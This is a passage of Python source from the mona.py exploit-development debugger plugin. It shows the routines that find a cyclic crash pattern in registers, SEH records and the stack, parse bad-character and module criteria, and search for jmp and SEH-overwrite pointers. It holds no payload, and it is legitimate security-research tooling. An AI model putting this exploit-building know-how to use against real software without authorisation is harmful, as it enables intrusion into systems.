	distance - limit the stack walking sections to ESP +/- this number of bytes (0 = walk the entire stack)
	args     - dictionary with the command arguments (used for optional pattern settings)
	Return:
	Dictionary with results of the search operation
"""
results = {}
regs = dbg.getRegs()
criteria = {}
criteria["accesslevel"] = "*"
tofile = ""
global silent
oldsilent = silent
silent=True
fullpattern = createPattern(50000,args)
factor = 1
#are we attached to an application ?
if dbg.getDebuggedPid() == 0:
dbg.log("*** Attach to an application, and trigger a crash with a cyclic pattern ! ***",highlight=1)
return {}
	#1. find beginning of cyclic pattern in memory ?
patbegin = createPattern(6,args)
silent=oldsilent
pattypes = ["normal","unicode","lower","upper"]
if not silent:
dbg.log("[+] Looking for cyclic pattern in memory")
tofile += "[+] Looking for cyclic pattern in memory\n"
for pattype in pattypes:
dbg.updateLog()
searchPattern = []
#create search pattern
factor = 1
if pattype == "normal":
searchPattern.append([patbegin, patbegin])
if pattype == "unicode":
patbegin_unicode = ""
factor = 0.5
for pbyte in patbegin:
patbegin_unicode += pbyte + "\x00"
searchPattern.append([patbegin_unicode, patbegin_unicode])
if pattype == "lower":
searchPattern.append([patbegin.lower(), patbegin.lower()])
if pattype == "upper":
searchPattern.append([patbegin.upper(), patbegin.upper()])
#search
pointers = searchInRange(searchPattern,0,TOP_USERLAND,criteria)
memory={}
if len(pointers) > 0:
for ptrtypes in pointers:
for ptr in pointers[ptrtypes]:
#get size
thissize = getPatternLength(ptr,pattype,args)
if thissize > 0:
if not silent:
dbg.log(" Cyclic pattern (%s) found at 0x%s (length %d bytes)" % (pattype,toHex(ptr),thissize))
tofile += " Cyclic pattern (%s) found at 0x%s (length %d bytes)\n" % (pattype,toHex(ptr),thissize)
if not ptr in memory:
memory[ptr] = ([thissize,pattype])
#get distance from ESP
if "ESP" in regs:
thisesp = regs["ESP"]
thisptr = MnPointer(ptr)
if thisptr.isOnStack():
if ptr > thisesp:
if not silent:
dbg.log(" - Stack pivot between %d & %d bytes needed to land in this pattern" % (ptr-thisesp,ptr-thisesp+thissize))
tofile += " - Stack pivot between %d & %d bytes needed to land in this pattern\n" % (ptr-thisesp,ptr-thisesp+thissize)
if not "memory" in results:
results["memory"] = memory
#2. registers overwritten ?
if not silent:
dbg.log("[+] Examining registers")
registers = {}
registers_to = {}
for reg in regs:
for pattype in pattypes:
dbg.updateLog()
regpattern = fullpattern
hexpat = toHex(regs[reg])
hexpatr = hexpat
factor = 1
hexpat = toAscii(hexpat[6]+hexpat[7])+toAscii(hexpat[4]+hexpat[5])+toAscii(hexpat[2]+hexpat[3])+toAscii(hexpat[0]+hexpat[1])
hexpatrev = toAscii(hexpatr[0]+hexpatr[1])+toAscii(hexpatr[2]+hexpatr[3])+toAscii(hexpatr[4]+hexpatr[5])+toAscii(hexpatr[6]+hexpatr[7])
if pattype == "upper":
regpattern = regpattern.upper()
if pattype == "lower":
regpattern = regpattern.lower()
if pattype == "unicode":
regpattern = toUnicode(regpattern)
factor = 0.5
offset = regpattern.find(hexpat)
if offset > -1:
if pattype == "unicode":
offset = offset * factor
if not silent:
dbg.log(" %s contains %s pattern : 0x%s (offset %d)" % (reg,pattype,toHex(regs[reg]),offset))
tofile += " %s contains %s pattern : 0x%s (offset %d)\n" % (reg,pattype,toHex(regs[reg]),offset)
if not reg in registers:
registers[reg] = ([regs[reg],offset,pattype])
else:
# maybe it's reversed ?
offset = regpattern.find(hexpatrev)
if offset > -1:
if pattype == "unicode":
offset = offset * factor
if not silent:
dbg.log(" %s contains %s pattern (reversed) : 0x%s (offset %d)" % (reg,pattype,toHex(regs[reg]),offset))
tofile += " %s contains %s pattern (reversed) : 0x%s (offset %d)\n" % (reg,pattype,toHex(regs[reg]),offset)
if not reg in registers:
registers[reg] = ([regs[reg],offset,pattype])
# maybe register points into cyclic pattern
mempat = ""
try:
mempat = dbg.readMemory(regs[reg],4)
except:
pass
if mempat != "":
if pattype == "normal":
regpattern = fullpattern
if pattype == "upper":
regpattern = fullpattern.upper()
if pattype == "lower":
regpattern = fullpattern.lower()
if pattype == "unicode":
mempat = dbg.readMemory(regs[reg],8)
mempat = mempat.replace('\x00','')
offset = regpattern.find(mempat)
if offset > -1:
thissize = getPatternLength(regs[reg],pattype,args)
if thissize > 0:
if not silent:
dbg.log(" %s (0x%s) points at offset %d in %s pattern (length %d)" % (reg,toHex(regs[reg]),offset,pattype,thissize))
tofile += " %s (0x%s) points at offset %d in %s pattern (length %d)\n" % (reg,toHex(regs[reg]),offset,pattype,thissize)
if not reg in registers_to:
registers_to[reg] = ([regs[reg],offset,thissize,pattype])
else:
registers_to[reg] = ([regs[reg],offset,thissize,pattype])
else:
# reversed ?
offset = regpattern.find(mempat[::-1])
if offset > -1:
thissize = getPatternLength(regs[reg],pattype,args)
if thissize > 0:
if not silent:
dbg.log(" %s (0x%s) points at offset %d in (reversed) %s pattern (length %d)" % (reg,toHex(regs[reg]),offset,pattype,thissize))
tofile += " %s (0x%s) points at offset %d in (reversed) %s pattern (length %d)\n" % (reg,toHex(regs[reg]),offset,pattype,thissize)
if not reg in registers_to:
registers_to[reg] = ([regs[reg],offset,thissize,pattype])
else:
registers_to[reg] = ([regs[reg],offset,thissize,pattype])
if not "registers" in results:
results["registers"] = registers
if not "registers_to" in results:
results["registers_to"] = registers_to
#3. SEH record overwritten ?
seh = {}
if not silent:
dbg.log("[+] Examining SEH chain")
tofile += "[+] Examining SEH chain\r\n"
thissehchain=dbg.getSehChain()
for chainentry in thissehchain:
address = chainentry[0]
sehandler = chainentry[1]
nseh = 0
nsehvalue = 0
nsehascii = ""
try:
nsehascii = dbg.readMemory(address,4)
nsehvalue = struct.unpack('<L',nsehascii)[0]
nseh = "%08x" % nsehvalue
except:
nseh = 0
sehandler = 0
if nseh != 0 :
for pattype in pattypes:
dbg.updateLog()
regpattern = fullpattern
hexpat = nsehascii
factor = 1
takeout = 4
divide = 1
if pattype == "upper":
regpattern = regpattern.upper()
if pattype == "lower":
regpattern = regpattern.lower()
if pattype == "unicode":
#get next 4 bytes too
nsehascii = dbg.readMemory(address,8)
hexpat = nsehascii.replace('\x00','')
takeout = 0
divide = 2
offset = regpattern.find(hexpat)
thissize = 0
if offset > -1:
thepointer = MnPointer(chainentry[0])
if thepointer.isOnStack():
thissize = getPatternLength(address+4,pattype)
if thissize > 0:
thissize = (thissize - takeout)/divide
if not silent:
dbg.log(" SEH record (nseh field) at 0x%s overwritten with %s pattern : 0x%s (offset %d), followed by %d bytes of cyclic data after the handler" % (toHex(chainentry[0]),pattype,nseh,offset,thissize))
tofile += " SEH record (nseh field) at 0x%s overwritten with %s pattern : 0x%s (offset %d), followed by %d bytes of cyclic data after the handler\n" % (toHex(chainentry[0]),pattype,nseh,offset,thissize)
if not chainentry[0]+4 in seh:
seh[chainentry[0]+4] = ([chainentry[1],offset,pattype,thissize])
if not "seh" in results:
results["seh"] = seh
stack = {}
stackcontains = {}
#4. walking stack
if "ESP" in regs:
curresp = regs["ESP"]
if not silent:
if distance == 0:
extratxt = "(entire stack)"
else:
extratxt = "(+- "+str(distance)+" bytes)"
dbg.log("[+] Examining stack %s - looking for cyclic pattern" % extratxt)
tofile += "[+] Examining stack %s - looking for cyclic pattern\n" % extratxt
# get stack this address belongs to
stacks = getStacks()
thisstackbase = 0
thisstacktop = 0
if distance < 1:
for tstack in stacks:
if (stacks[tstack][0] < curresp) and (curresp < stacks[tstack][1]):
thisstackbase = stacks[tstack][0]
thisstacktop = stacks[tstack][1]
else:
thisstackbase = curresp - distance
thisstacktop = curresp + distance + 8
stackcounter = thisstackbase
sign=""
if not silent:
dbg.log(" Walking stack from 0x%s to 0x%s (0x%s bytes)" % (toHex(stackcounter),toHex(thisstacktop-4),toHex(thisstacktop-4-stackcounter)))
tofile += " Walking stack from 0x%s to 0x%s (0x%s bytes)\n" % (toHex(stackcounter),toHex(thisstacktop-4),toHex(thisstacktop-4-stackcounter))
# stack contains part of a cyclic pattern ?
while stackcounter < thisstacktop-4:
espoffset = stackcounter - curresp
stepsize = 4
dbg.updateLog()
if espoffset > -1:
sign="+"
else:
sign="-"
cont = dbg.readMemory(stackcounter,4)
if len(cont) == 4:
contat = cont
if contat <> "":
for pattype in pattypes:
dbg.updateLog()
regpattern = fullpattern
hexpat = contat
if pattype == "upper":
regpattern = regpattern.upper()
if pattype == "lower":
regpattern = regpattern.lower()
if pattype == "unicode":
hexpat1 = dbg.readMemory(stackcounter,4)
hexpat2 = dbg.readMemory(stackcounter+4,4)
hexpat1 = hexpat1.replace('\x00','')
hexpat2 = hexpat2.replace('\x00','')
if hexpat1 == "" or hexpat2 == "":
#no unicode
hexpat = ""
break
else:
hexpat = hexpat1 + hexpat2
if len(hexpat) == 4:
offset = regpattern.find(hexpat)
currptr = stackcounter
if offset > -1:
thissize = getPatternLength(currptr,pattype)
offsetvalue = int(str(espoffset).replace("-",""))
if thissize > 0:
stepsize = thissize
if thissize/4*4 != thissize:
stepsize = (thissize/4*4) + 4
# align stack again
if not silent:
espoff = 0
espsign = "+"
if ((stackcounter + thissize) >= curresp):
espoff = (stackcounter + thissize) - curresp
else:
espoff = curresp - (stackcounter + thissize)
espsign = "-"
dbg.log(" 0x%s : Contains %s cyclic pattern at ESP%s0x%s (%s%s) : offset %d, length %d (-> 0x%s : ESP%s0x%s)" % (toHex(stackcounter),pattype,sign,rmLeading(toHex(offsetvalue),"0"),sign,offsetvalue,offset,thissize,toHex(stackcounter+thissize-1),espsign,rmLeading(toHex(espoff),"0")))
tofile += " 0x%s : Contains %s cyclic pattern at ESP%s0x%s (%s%s) : offset %d, length %d (-> 0x%s : ESP%s0x%s)\n" % (toHex(stackcounter),pattype,sign,rmLeading(toHex(offsetvalue),"0"),sign,offsetvalue,offset,thissize,toHex(stackcounter+thissize-1),espsign,rmLeading(toHex(espoff),"0"))
if not currptr in stackcontains:
stackcontains[currptr] = ([offsetvalue,sign,offset,thissize,pattype])
else:
#if we are close to ESP, change stepsize to 1
if offsetvalue <= 256:
stepsize = 1
stackcounter += stepsize
# stack has pointer into cyclic pattern ?
if not silent:
if distance == 0:
extratxt = "(entire stack)"
else:
extratxt = "(+- "+str(distance)+" bytes)"
dbg.log("[+] Examining stack %s - looking for pointers to cyclic pattern" % extratxt)
tofile += "[+] Examining stack %s - looking for pointers to cyclic pattern\n" % extratxt
# get stack this address belongs to
stacks = getStacks()
thisstackbase = 0
thisstacktop = 0
if distance < 1:
for tstack in stacks:
if (stacks[tstack][0] < curresp) and (curresp < stacks[tstack][1]):
thisstackbase = stacks[tstack][0]
thisstacktop = stacks[tstack][1]
else:
thisstackbase = curresp - distance
thisstacktop = curresp + distance + 8
stackcounter = thisstackbase
sign=""
if not silent:
dbg.log(" Walking stack from 0x%s to 0x%s (0x%s bytes)" % (toHex(stackcounter),toHex(thisstacktop-4),toHex(thisstacktop-4-stackcounter)))
tofile += " Walking stack from 0x%s to 0x%s (0x%s bytes)\n" % (toHex(stackcounter),toHex(thisstacktop-4),toHex(thisstacktop-4-stackcounter))
while stackcounter < thisstacktop-4:
espoffset = stackcounter - curresp
dbg.updateLog()
if espoffset > -1:
sign="+"
else:
sign="-"
cont = dbg.readMemory(stackcounter,4)
if len(cont) == 4:
cval=""
for sbytes in cont:
tval = hex(ord(sbytes)).replace("0x","")
if len(tval) < 2:
tval="0"+tval
cval = tval+cval
try:
contat = dbg.readMemory(hexStrToInt(cval),4)
except:
contat = ""
if contat <> "":
for pattype in pattypes:
dbg.updateLog()
regpattern = fullpattern
hexpat = contat
if pattype == "upper":
regpattern = regpattern.upper()
if pattype == "lower":
regpattern = regpattern.lower()
if pattype == "unicode":
hexpat1 = dbg.readMemory(stackcounter,4)
hexpat2 = dbg.readMemory(stackcounter+4,4)
hexpat1 = hexpat1.replace('\x00','')
hexpat2 = hexpat2.replace('\x00','')
if hexpat1 == "" or hexpat2 == "":
#no unicode
hexpat = ""
break
else:
hexpat = hexpat1 + hexpat2
if len(hexpat) == 4:
offset = regpattern.find(hexpat)
currptr = hexStrToInt(cval)
if offset > -1:
thissize = getPatternLength(currptr,pattype)
if thissize > 0:
offsetvalue = int(str(espoffset).replace("-",""))
if not silent:
dbg.log(" 0x%s : Pointer into %s cyclic pattern at ESP%s0x%s (%s%s) : 0x%s : offset %d, length %d" % (toHex(stackcounter),pattype,sign,rmLeading(toHex(offsetvalue),"0"),sign,offsetvalue,toHex(currptr),offset,thissize))
tofile += " 0x%s : Pointer into %s cyclic pattern at ESP%s0x%s (%s%s) : 0x%s : offset %d, length %d\n" % (toHex(stackcounter),pattype,sign,rmLeading(toHex(offsetvalue),"0"),sign,offsetvalue,toHex(currptr),offset,thissize)
if not currptr in stack:
stack[currptr] = ([offsetvalue,sign,offset,thissize,pattype])
stackcounter += 4
else:
dbg.log("** Are you connected to an application ?",highlight=1)
if not "stack" in results:
results["stack"] = stack
if not "stackcontains" in results:
results["stackcontains"] = stack
if tofile != "":
objfindmspfile = MnLog("findmsp.txt")
findmspfile = objfindmspfile.reset()
objfindmspfile.write(tofile,findmspfile)
return results
#-----------------------------------------------------------------------#
# convert arguments to criteria
#-----------------------------------------------------------------------#
def args2criteria(args,modulecriteria,criteria):
thisversion,thisrevision = getVersionInfo(inspect.stack()[0][1])
thisversion = thisversion.replace("'","")
dbg.logLines("\n---------- Mona command started on %s (v%s, rev %s) ----------" % (datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"),thisversion,thisrevision))
dbg.log("[+] Processing arguments and criteria")
global ptr_to_get
# meets access level ?
criteria["accesslevel"] = "X"
if "x" in args :
if not args["x"].upper() in ["*","R","RW","RX","RWX","W","WX","X"]:
dbg.log("invalid access level : %s" % args["x"], highlight=1)
criteria["accesslevel"] = ""
else:
criteria["accesslevel"] = args["x"].upper()
dbg.log(" - Pointer access level : %s" % criteria["accesslevel"])
# query OS modules ?
if "o" in args and args["o"]:
modulecriteria["os"] = False
dbg.log(" - Ignoring OS modules")
# allow nulls ?
if "n" in args and args["n"]:
criteria["nonull"] = True
dbg.log(" - Ignoring pointers that have null bytes")
# override list of modules to query ?
if "m" in args:
if type(args["m"]).__name__.lower() <> "bool":
modulecriteria["modules"] = args["m"]
dbg.log(" - Only querying modules %s" % args["m"])
# limit nr of pointers to search ?
if "p" in args:
if str(args["p"]).lower() != "true":
ptr_to_get = int(args["p"].strip())
if ptr_to_get > 0:
dbg.log(" - Maximum nr of pointers to return : %d" % ptr_to_get)
# only want to see specific type of pointers ?
if "cp" in args:
ptrcriteria = args["cp"].split(",")
for ptrcrit in ptrcriteria:
ptrcrit=ptrcrit.strip("'")
ptrcrit=ptrcrit.strip('"').lower().strip()
criteria[ptrcrit] = True
dbg.log(" - Pointer criteria : %s" % ptrcriteria)
if "cpb" in args:
badchars = args["cpb"]
badchars = badchars.replace("'","")
badchars = badchars.replace('"',"")
badchars = badchars.replace("\\x","")
# see if we need to expand ..
bpos = 0
newbadchars = ""
while bpos < len(badchars):
curchar = badchars[bpos]+badchars[bpos+1]
if curchar == "..":
pos = bpos
if pos > 1 and pos <= len(badchars)-4:
# get byte before and after ..
bytebefore = badchars[pos-2] + badchars[pos-1]
byteafter = badchars[pos+2] + badchars[pos+3]
bbefore = int(bytebefore,16)
bafter = int(byteafter,16)
insertbytes = ""
bbefore += 1
while bbefore < bafter:
insertbytes += "%02x" % bbefore
bbefore += 1
newbadchars += insertbytes
else:
newbadchars += curchar
bpos += 2
badchars = newbadchars
cnt = 0
strb = ""
while cnt < len(badchars):
strb=strb+binascii.a2b_hex(badchars[cnt]+badchars[cnt+1])
cnt=cnt+2
criteria["badchars"] = strb
dbg.log(" - Bad char filter will be applied to pointers : %s " % args["cpb"])
if "cm" in args:
modcriteria = args["cm"].split(",")
for modcrit in modcriteria:
modcrit=modcrit.strip("'")
modcrit=modcrit.strip('"').lower().strip()
			#each criterion has 1 or 2 parts : criterion=value
modcritparts = modcrit.split("=")
try:
if len(modcritparts) < 2:
# set to True, no value given
modulecriteria[modcritparts[0].strip()] = True
else:
# read the value
modulecriteria[modcritparts[0].strip()] = (modcritparts[1].strip() == "true")
except:
continue
if (inspect.stack()[1][3] == "procShowMODULES"):
modcriteria = args["cm"].split(",")
for modcrit in modcriteria:
modcrit=modcrit.strip("'")
modcrit=modcrit.strip('"').lower().strip()
if modcrit.startswith("+"):
modulecriteria[modcrit]=True
else:
modulecriteria[modcrit]=False
dbg.log(" - Module criteria : %s" % modcriteria)
return modulecriteria,criteria
#manage breakpoint on selected exported/imported functions from selected modules
def doManageBpOnFunc(modulecriteria,criteria,funcfilter,mode="add",type="export"):
"""
Sets a breakpoint on selected exported/imported functions from selected modules
Arguments :
modulecriteria - Dictionary
funcfilter - comma separated string indicating functions to set bp on
			must contain "*" to select all functions
	mode - "add" to create bp's, "del" to remove bp's, "list" to only list the matching functions
Returns : nothing
"""
type = type.lower()
namecrit = funcfilter.split(",")
if mode == "add" or mode == "del" or mode == "list":
if not silent:
dbg.log("[+] Enumerating %sed functions" % type)
modulestosearch = getModulesToQuery(modulecriteria)
bpfuncs = {}
for thismodule in modulestosearch:
if not silent:
dbg.log(" Querying module %s" % thismodule)
# get all
themod = dbg.getModule(thismodule)
tmod = MnModule(thismodule)
shortname = tmod.getShortName()
syms = themod.getSymbols()
# get funcs
funcs = {}
if type == "export":
funcs = tmod.getEAT()
else:
funcs = tmod.getIAT()
if not silent:
dbg.log(" Total nr of %sed functions : %d" % (type,len(funcs)))
for func in funcs:
if meetsCriteria(MnPointer(func), criteria):
funcname = funcs[func].lower()
setbp = False
if "*" in namecrit:
setbp = True
else:
for crit in namecrit:
crit = crit.lower()
tcrit = crit.replace("*","")
if (crit.startswith("*") and crit.endswith("*")) or (crit.find("*") == -1):
if funcname.find(tcrit) > -1:
setbp = True
elif crit.startswith("*"):
if funcname.endswith(tcrit):
setbp = True
elif crit.endswith("*"):
if funcname.startswith(tcrit):
setbp = True
if setbp:
if type == "export":
if not func in bpfuncs:
bpfuncs[func] = funcs[func]
else:
ptr = 0
try:
#read pointer of imported function
ptr=struct.unpack('<L',dbg.readMemory(func,4))[0]
except:
pass
if ptr > 0:
if not ptr in bpfuncs:
bpfuncs[ptr] = funcs[func]
if __DEBUGGERAPP__ == "WinDBG":
# let's do a few searches
for crit in namecrit:
if crit.find("*") == -1:
crit = "*" + crit + "*"
modsearch = "x %s!%s" % (shortname,crit)
output = dbg.nativeCommand(modsearch)
outputlines = output.split("\n")
for line in outputlines:
if line.replace(" ","") != "":
linefields = line.split(" ")
if len(linefields) > 1:
ptr = hexStrToInt(linefields[0])
cnt = 1
while cnt < len(linefields)-1:
if linefields[cnt] != "":
funcname = linefields[cnt]
break
cnt += 1
if not ptr in bpfuncs:
bpfuncs[ptr] = funcname
if not silent:
dbg.log("[+] Total nr of breakpoints to process : %d" % len(bpfuncs))
if len(bpfuncs) > 0:
for funcptr in bpfuncs:
if mode == "add":
dbg.log("Set bp at 0x%s (%s in %s)" % (toHex(funcptr),bpfuncs[funcptr],MnPointer(funcptr).belongsTo()))
try:
dbg.setBreakpoint(funcptr)
except:
dbg.log("Failed setting bp at 0x%s" % toHex(funcptr))
elif mode == "del":
dbg.log("Remove bp at 0x%s (%s in %s)" % (toHex(funcptr),bpfuncs[funcptr],MnPointer(funcptr).belongsTo()))
try:
dbg.deleteBreakpoint(funcptr)
except:
dbg.log("Skipped removal of bp at 0x%s" % toHex(funcptr))
elif mode == "list":
dbg.log("Match found at 0x%s (%s in %s)" % (toHex(funcptr),bpfuncs[funcptr],MnPointer(funcptr).belongsTo()))
return
#-----------------------------------------------------------------------#
# main
#-----------------------------------------------------------------------#
def main(args):
dbg.createLogWindow()
global currentArgs
currentArgs = copy.copy(args)
try:
starttime = datetime.datetime.now()
ptr_counter = 0
# initialize list of commands
commands = {}
# ----- HELP ----- #
def getBanner():
banners = {}
bannertext = ""
bannertext += " |------------------------------------------------------------------|\n"
bannertext += " | __ __ |\n"
bannertext += " | _________ ________ / /___ _____ / /____ ____ _____ ___ |\n"
bannertext += " | / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |\n"
bannertext += " | / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |\n"
bannertext += " | \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |\n"
bannertext += " | |\n"
bannertext += " | https://www.corelan.be | https://www.corelan-training.com |\n"
bannertext += " |------------------------------------------------------------------|\n"
banners[0] = bannertext
bannertext = ""
bannertext += " |------------------------------------------------------------------|\n"
bannertext += " | _ __ ___ ___ _ __ __ _ _ __ _ _ |\n"
bannertext += " | | '_ ` _ \ / _ \ | '_ \ / _` | | '_ \ | | | | |\n"
bannertext += " | | | | | | || (_) || | | || (_| | _ | |_) || |_| | |\n"
bannertext += " | |_| |_| |_| \___/ |_| |_| \__,_|(_)| .__/ \__, | |\n"
bannertext += " | |_| |___/ |\n"
bannertext += " | |\n"
bannertext += " |------------------------------------------------------------------|\n"
banners[1] = bannertext
bannertext = ""
bannertext += " |------------------------------------------------------------------|\n"
bannertext += " | |\n"
bannertext += " | _____ ___ ____ ____ ____ _ |\n"
bannertext += " | / __ `__ \/ __ \/ __ \/ __ `/ https://www.corelan.be |\n"
bannertext += " | / / / / / / /_/ / / / / /_/ / https://www.corelan-training.com|\n"
bannertext += " | /_/ /_/ /_/\____/_/ /_/\__,_/ #corelan (Freenode IRC) |\n"
bannertext += " | |\n"
bannertext += " |------------------------------------------------------------------|\n"
banners[2] = bannertext
bannertext = ""
bannertext += "\n .##.....##..#######..##....##....###........########..##....##\n"
bannertext += " .###...###.##.....##.###...##...##.##.......##.....##..##..##.\n"
bannertext += " .####.####.##.....##.####..##..##...##......##.....##...####..\n"
bannertext += " .##.###.##.##.....##.##.##.##.##.....##.....########.....##...\n"
bannertext += " .##.....##.##.....##.##..####.#########.....##...........##...\n"
bannertext += " .##.....##.##.....##.##...###.##.....##.###.##...........##...\n"
bannertext += " .##.....##..#######..##....##.##.....##.###.##...........##...\n\n"
banners[3] = bannertext
# pick random banner
bannerlist = []
for i in range (0, len(banners)):
bannerlist.append(i)
random.shuffle(bannerlist)
return banners[bannerlist[0]]
def procHelp(args):
dbg.log(" 'mona' - Exploit Development Swiss Army Knife - %s (%sbit)" % (__DEBUGGERAPP__,str(arch)))
dbg.log(" Plugin version : %s r%s" % (__VERSION__,__REV__))
if __DEBUGGERAPP__ == "WinDBG":
pykdversion = dbg.getPyKDVersionNr()
dbg.log(" PyKD version %s" % pykdversion)
dbg.log(" Written by Corelan - https://www.corelan.be")
dbg.log(" Project page : https://github.com/corelan/mona")
dbg.logLines(getBanner(),highlight=1)
dbg.log("Global options :")
dbg.log("----------------")
dbg.log("You can use one or more of the following global options on any command that will perform")
dbg.log("a search in one or more modules, returning a list of pointers :")
dbg.log(" -n : Skip modules that start with a null byte. If this is too broad, use")
dbg.log(" option -cp nonull instead")
dbg.log(" -o : Ignore OS modules")
dbg.log(" -p <nr> : Stop search after <nr> pointers.")
dbg.log(" -m <module,module,...> : only query the given modules. Be sure what you are doing !")
dbg.log(" You can specify multiple modules (comma separated)")
dbg.log(" Tip : you can use -m * to include all modules. All other module criteria will be ignored")
dbg.log(" Other wildcards : *blah.dll = ends with blah.dll, blah* = starts with blah,")
dbg.log(" blah or *blah* = contains blah")
dbg.log(" -cm <crit,crit,...> : Apply some additional criteria to the modules to query.")
dbg.log(" You can use one or more of the following criteria :")
dbg.log(" aslr,safeseh,rebase,nx,os")
dbg.log(" You can enable or disable a certain criterium by setting it to true or false")
dbg.log(" Example : -cm aslr=true,safeseh=false")
dbg.log(" Suppose you want to search for p/p/r in aslr enabled modules, you could call")
dbg.log(" !mona seh -cm aslr")
dbg.log(" -cp <crit,crit,...> : Apply some criteria to the pointers to return")
dbg.log(" Available options are :")
dbg.log(" unicode,ascii,asciiprint,upper,lower,uppernum,lowernum,numeric,alphanum,nonull,startswithnull,unicoderev")
dbg.log(" Note : Multiple criteria will be evaluated using 'AND', except if you are looking for unicode + one crit")
dbg.log(" -cpb '\\x00\\x01' : Provide list with bad chars, applies to pointers")
dbg.log(" You can use .. to indicate a range of bytes (in between 2 bad chars)")
dbg.log(" -x <access> : Specify desired access level of the returning pointers. If not specified,")
dbg.log(" only executable pointers will be returned.")
dbg.log(" Access levels can be one of the following values : R,W,X,RW,RX,WX,RWX or *")
if not args:
args = []
if len(args) > 1:
thiscmd = args[1].lower().strip()
if thiscmd in commands:
dbg.log("")
dbg.log("Usage of command '%s' :" % thiscmd)
dbg.log("%s" % ("-" * (22 + len(thiscmd))))
dbg.logLines(commands[thiscmd].usage)
dbg.log("")
else:
aliasfound = False
for cmd in commands:
if commands[cmd].alias == thiscmd:
dbg.log("")
dbg.log("Usage of command '%s' :" % thiscmd)
dbg.log("%s" % ("-" * (22 + len(thiscmd))))
dbg.logLines(commands[cmd].usage)
dbg.log("")
aliasfound = True
if not aliasfound:
dbg.logLines("\nCommand %s does not exist. Run !mona to get a list of available commands\n" % thiscmd,highlight=1)
else:
dbg.logLines("\nUsage :")
dbg.logLines("-------\n")
dbg.log(" !mona <command> <parameter>")
dbg.logLines("\nAvailable commands and parameters :\n")
items = commands.items()
items.sort(key = itemgetter(0))
for item in items:
if commands[item[0]].usage <> "":
aliastxt = ""
if commands[item[0]].alias != "":
aliastxt = " / " + commands[item[0]].alias
dbg.logLines("%s | %s" % (item[0] + aliastxt + (" " * (20 - len(item[0]+aliastxt))), commands[item[0]].description))
dbg.log("")
dbg.log("Want more info about a given command ? Run !mona help <command>",highlight=1)
dbg.log("")
commands["help"] = MnCommand("help", "show help", "!mona help [command]",procHelp)
# ----- Config file management ----- #
def procConfig(args):
#did we specify -get, -set or -add?
showerror = False
if not "set" in args and not "get" in args and not "add" in args:
showerror = True
if "set" in args:
if type(args["set"]).__name__.lower() == "bool":
showerror = True
else:
#count nr of words
params = args["set"].split(" ")
if len(params) < 2:
showerror = True
if "add" in args:
if type(args["add"]).__name__.lower() == "bool":
showerror = True
else:
#count nr of words
params = args["add"].split(" ")
if len(params) < 2:
showerror = True
if "get" in args:
if type(args["get"]).__name__.lower() == "bool":
showerror = True
else:
#count nr of words
params = args["get"].split(" ")
if len(params) < 1:
showerror = True
if showerror:
dbg.log("Usage :")
dbg.logLines(configUsage,highlight=1)
return
else:
if "get" in args:
dbg.log("Reading value from configuration file")
monaConfig = MnConfig()
thevalue = monaConfig.get(args["get"])
dbg.log("Parameter %s = %s" % (args["get"],thevalue))
if "set" in args:
dbg.log("Writing value to configuration file")
monaConfig = MnConfig()
value = args["set"].split(" ")
configparam = value[0].strip()
dbg.log("Old value of parameter %s = %s" % (configparam,monaConfig.get(configparam)))
configvalue = args["set"][0+len(configparam):len(args["set"])]
monaConfig.set(configparam,configvalue)
dbg.log("New value of parameter %s = %s" % (configparam,configvalue))
if "add" in args:
dbg.log("Writing value to configuration file")
monaConfig = MnConfig()
value = args["add"].split(" ")
configparam = value[0].strip()
dbg.log("Old value of parameter %s = %s" % (configparam,monaConfig.get(configparam)))
configvalue = monaConfig.get(configparam).strip() + "," + args["add"][0+len(configparam):len(args["add"])].strip()
monaConfig.set(configparam,configvalue)
dbg.log("New value of parameter %s = %s" % (configparam,configvalue))
# ----- Jump to register ----- #
def procFindJ(args):
return procFindJMP(args)
def procFindJMP(args):
#default criteria
modulecriteria={}
modulecriteria["aslr"] = False
modulecriteria["rebase"] = False
if (inspect.stack()[1][3] == "procFindJ"):
dbg.log(" ** Note : command 'j' has been replaced with 'jmp'. Now launching 'jmp' instead...",highlight=1)
criteria={}
all_opcodes={}
global ptr_to_get
ptr_to_get = -1
distancestr = ""
mindistance = 0
maxdistance = 0
#did user specify -r <reg> ?
showerror = False
if "r" in args:
if type(args["r"]).__name__.lower() == "bool":
showerror = True
else:
#valid register ?
thisreg = args["r"].upper().strip()
validregs = dbglib.Registers32BitsOrder
if not thisreg in validregs:
showerror = True
else:
showerror = True
if "distance" in args:
if type(args["distance"]).__name__.lower() == "bool":
showerror = True
else:
distancestr = args["distance"]
distanceparts = distancestr.split(",")
for parts in distanceparts:
valueparts = parts.split("=")
if len(valueparts) > 1:
if valueparts[0].lower() == "min":
try:
mindistance = int(valueparts[1])
except:
mindistance = 0
if valueparts[0].lower() == "max":
try:
maxdistance = int(valueparts[1])
except:
maxdistance = 0
if maxdistance < mindistance:
tmp = maxdistance
maxdistance = mindistance
mindistance = tmp
criteria["mindistance"] = mindistance
criteria["maxdistance"] = maxdistance
if showerror:
dbg.log("Usage :")
dbg.logLines(jmpUsage,highlight=1)
return
else:
modulecriteria,criteria = args2criteria(args,modulecriteria,criteria)
# go for it !
all_opcodes=findJMP(modulecriteria,criteria,args["r"].lower().strip())
# write to log
logfile = MnLog("jmp.txt")
thislog = logfile.reset()
processResults(all_opcodes,logfile,thislog)
# ----- Exception Handler Overwrites ----- #
def procFindSEH(args):
#default criteria
modulecriteria={}
modulecriteria["safeseh"] = False
modulecriteria["aslr"] = False
modulecriteria["rebase"] = False
criteria = {}
specialcases = {}
all_opcodes = {}
global ptr_to_get
ptr_to_get = -1
#what is the caller function (backwards compatibility with pvefindaddr)
modulecriteria,criteria = args2criteria(args,modulecriteria,criteria)
if "rop" in args:
criteria["rop"] = True
if "all" in args:
criteria["all"] = True
specialcases["maponly"] = True
else:
criteria["all"] = False
specialcases["maponly"] = False
# go for it !
all_opcodes = findSEH(modulecriteria,criteria)
#report findings to log
logfile = MnLog("seh.txt")
thislog = logfile.reset()
processResults(all_opcodes,logfile,thislog,specialcases)
# ----- MODULES ------ #
def procShowMODULES(args):
modulecriteria={}
criteria={}
modulecriteria,criteria = args2criteria(args,modulecriteria,criteria)
modulestosearch = getModulesToQuery(modulecriteria)
